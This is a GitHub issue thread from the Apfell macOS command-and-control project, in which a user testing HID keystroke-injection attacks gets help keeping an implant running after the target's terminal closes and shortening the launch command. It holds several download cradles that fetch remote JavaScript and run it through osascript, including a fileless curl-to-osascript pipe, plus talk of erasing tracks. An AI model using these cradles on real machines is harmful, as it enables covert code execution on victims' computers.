### ISSUE TITLE
when terminal closes on target macOS machine it kills the active PID

### ISSUE THREAD

**Issue by careyjames** [its-a-feature/Apfell#29]
please forgive the n00b question.
when terminal closes on target macOS machine it ends the active PID, how do we successfully close the terminal on target machine without killing the process?

Thank you!

osascript -l JavaScript -e "eval(ObjC.unwrap( $.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://serverIPhere/update.js')), $.NSUTF8StringEncoding)));"

**Comment by its-a-feature** [comment]
Hey! No worries, happy to help. 

That's happening because the `osascript` binary is still running as your foreground process. To get around this, you need to background your process. The easiest way to do this is to append `&` to the very end of your command.

**Comment by careyjames** [comment]
thank you that worked!

another question since I'm testing HID attacks,

curl -s -o update.js http://192.168.1.8/update.js && osascript ~/update.js&

this also works, its less text to type for an HID device but then Id have to erase my tracks by rm-ing the file.

any thoughts on getting it shorter?

I couldn't for the life of me figure you how to use pipe to execute it without saving to disk...

**Comment by its-a-feature** [comment]
Awesome!

Oh yeah? Definitely interested in what you find :)

You can do `curl http://192.168.1.8/update.js | osascript -l JavaScript &` as well. If you're reading a file from disk with the `.js` extension, then you don't need the `-l JavaScript` component since `osascript` can infer it from the file extension. However, if you're doing it via the download cradle (the -e eval thing, through a pipe, or any other file extension, then you have to specify the language with `-l JavaScript` since by default it thinks the language is `AppleScript` and will error with the JavaScript code

**Comment by careyjames** [comment]
yes! that is the magic!

curl -s http://192.168.1.8/update.js | osascript -l JavaScript &

a super compact one-liner!

thanks for being nice to a n00b!
